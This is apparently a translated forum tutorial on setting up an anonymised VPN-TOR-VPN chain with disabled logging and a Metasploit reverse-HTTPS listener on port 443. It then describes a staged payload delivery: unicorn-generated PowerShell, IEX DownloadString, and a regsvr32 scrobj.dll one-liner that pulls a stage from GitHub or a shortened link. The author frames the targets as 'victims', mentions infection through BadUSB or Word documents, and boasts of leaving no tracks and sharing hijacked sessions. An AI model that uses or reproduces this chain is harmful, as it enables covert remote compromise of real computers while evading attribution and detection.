sudo vi /etc/ssh/sshd_config

sudo vi /etc/openvpn/server.conf



sudo ufw allow 2375

sudo ufw allow 2376





sudo vi /etc/openvpn/server.conf

sudo vi /etc/ssh/sshd_config





sudo systemctl restart ssh

sudo systemctl restart openvpn@server



sudo vi /etc/openvpn/client.conf

Disable VPN logging

ssh vpnsrv1

sudo vi /etc/openvpn/server.conf

;status openvpn-status.log

[QUOTE][/QUOTE]



sudo vi /etc/openvpn/client.conf

verb 0[/QUOTE]

[QUOTE]sudo systemctl restart openvpn@client

sudo systemctl restart openvpn@server Нажмите, чтобы раскрыть...

The same on the SRV2

Preapre for attack

Bash: sudo echo 'deb http://downloads.metasploit.com/data/releases/metasploit-framework/apt jessie main' | sudo tee /etc/apt/sources.list.d/metasploit-framework.list sudo wget -qO - http://apt.metasploit.com/metasploit-framework.gpg.key | sudo apt-key add - sudo apt update && sudo apt dist-upgrade sudo apt install metasploit-framework postgresql -y

Bash: sudo systemctl start postgresql msfdb init sudo ln -s /home/admin/.msf4/ /root/

Bash: sudo apt install screen

Bash: screen -S msf sudo msfconsole

Screen manual -S msf = set a session name

sudo msfconsole = sccreen command



#Send session to background

Ctrl+A then D



#background sesions list

screen -list



#Take sesion back

screen -r msf



#msf = session name

Bash: sudo ufw allow 443 sudo ufw allow 8443

Bash: screen -S msf sudo msfconsole use multi/handler set payload windows/meterpreter/reverse_https set LPORT 443 curl ident.me; echo set LHOST IP_address_of_SRV2 set ExitOnSession false set EnableStageEncoding true exploit -j Нажмите, чтобы раскрыть...

Payload delivery - Web Delivery

git clone https://github.com/trustedsec/unicorn.git

Next create stage2

Далее создаем stage2

Скрыто от гостей

Скрыто от гостей

info In last brackets put your raw address to your stage3 file which you uploaded to github

regsvr32 -s -n -u -i:https://raw.githubusercontent.com/XXXXXX/XXX/master/stage2 scrobj.dll



regsvr32 -s -n -u -i:http://bit.ly/XXXXX scrobj.dll

ssh vpnsrv2

screen -r msf

Hello again! In our last article we discussed creation of a chain VPN - TOR - VPN. Now lets prepare SRV2 for pentest and try it!In first part I forgot to notice that SRV1 and SRV2 better create in two different locations, like: one in Francfurt and another one in London.At first lets change SSH and OpenVPN ports to nonstandart.Connecting to SRV1 via SSHBefore port changing we need to allow them at first. For example lets change SSH from 4910 and OpenVPN on 4911.Now, change portsRestart services and remove old ports from allowed.Change ports on SRVAdvisably better use different ports on SRV1 and SRV2. On the second server in our example for SSH will be 2375 port, OpenVPN - 2376Connecting to SRV2Change ports SSH and VPN the same way as on the SRV1Restart exactly SSH or you will lose the connection!After openvpn@server restart the connection will be lost. Close the window ang move to the nex point.Back to the SRV1Edit the clients connection file to VPN SRV2.OpenVPN Client restartingsudo systemctl restart openvpn@clientConnection to SRV2 has been successfully recovered.In the first part i left the logs specially, they are needed for fixing if problems happen, but when we have adjusted everything correctly, lets turn them off.Comment next rowsverb 3 change to verb 0OpenVPN ClientCreate clients config file for connections to VPN SRV1For connection with SRV2 highly enough ssh. For the more comfort and for sending all our traffic via chain VPN - TOR -VPN, let's adjust our connection to VPN SRV1.Для связи с SRV2 нам вполне хватает ssh. Но для большего комфорта и пропуска всего трафика через цепочку VPN - TOR -VPN, настроим наше подключение к VPN SRV1. No wonder we did it.Connect to SRV1. In file /home/openvpn-ca/client-configs/base.conf change port on previously not changed in /etc/openvpn/server.conf (VPN SRV1 - 4911/udp)If you want to use one cert with a few and more devices in one time you should uncomment this row:;duplicate-cnCreate client's config file to exportCopy on your localhost (Kali Linux) and launch VPNNow all our traffic goes via chain VPN - TOR - VPN!Add info about SRV2 in ~/.ssh/config | HostName must be exactly 10.8.1.1 and be afraid of writing here your public IP of the second serverNow on our localhost if we just eneter ssh vpnsrv2 we will be in our SRV2 via our anonymous chainGo to SRV2 and install Metasploit Framework.If run metasploit from normal use he wont be able to listen a ports. Because of it we added .msf4 mirror to our root catalog. Comand for launchingsudo msfconsoleWell known that any program launched in ssh will close as soon as we exit from console. We also required that our server was always ready 24 hours a day to take guests with their candys as DarkNode was saying toFor realizing this we need the "screen" toollaunch msfconsole in screenGet up listener which will accept reverse shell. Before it we need to tell to firewall to accept the port which we will listen.We will acccept shell on 443 (https) port to avoid suspicious behavior from our side.Send msfconsole in background (Ctrl+A then D) and back in to Kali Linux.This is not a new way. I knew it from DarkNode.We can change payload on infected host at any time. We just need to change Stage3 and everything will be changedAlso we can leave our victim for a time (make Stage1 row empty) even with wireshark it will not find any tracksNext day just return Stahe 1 and get reverse shell as well!Also you can give intercepted sessions to your colleauge.Download unicorn from trustedse, for payload generationCode:GenerateRename powershell_attack.txt in stage3 and upload to github (create a new acc via our anonymous chain )We need Darknode criptsbase64_convertand XML cript for regsvr32I uploaded it tiLaunch ./base64_convert.pyArguments for converting suchIEX(New-Object Net.WebClient).DownloadString('Received command insert in to XML script showed above and save with "stage2" nameUpload it to github too.Finally we get stage2 link - "" if you short it on bit.ly it will be more convenientHere is stage 1 - command at a victims computer. (We have a lot of ways to do it: BadUSB, HTA, Word and so on)For better inderstanding it will be look like that with shorten url. Only 50 symbols can infect a computer.Go to SRV2 and look if reverse shell accepted a sessionWe can see that everything working well!! Also we can manage it via phone, Copy ssh key from SRV1 on your phone and install OpenVPN and you are on it.source: Анонимный Pentest [VPN -> TOR -> VPN] (Часть II) - Reverse Shell за локальной сетью